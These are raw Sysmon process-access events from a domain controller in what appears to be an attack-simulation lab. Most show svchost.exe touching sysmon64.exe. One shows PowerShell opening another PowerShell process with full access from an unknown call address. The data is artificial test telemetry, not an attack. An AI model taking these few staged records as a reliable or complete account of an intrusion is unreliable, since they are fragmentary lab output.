{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:41.765\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0329-5F25-0000-00109AAF0900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:41.765","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0329-5F25-0000-00109AAF0900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A4A03)","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
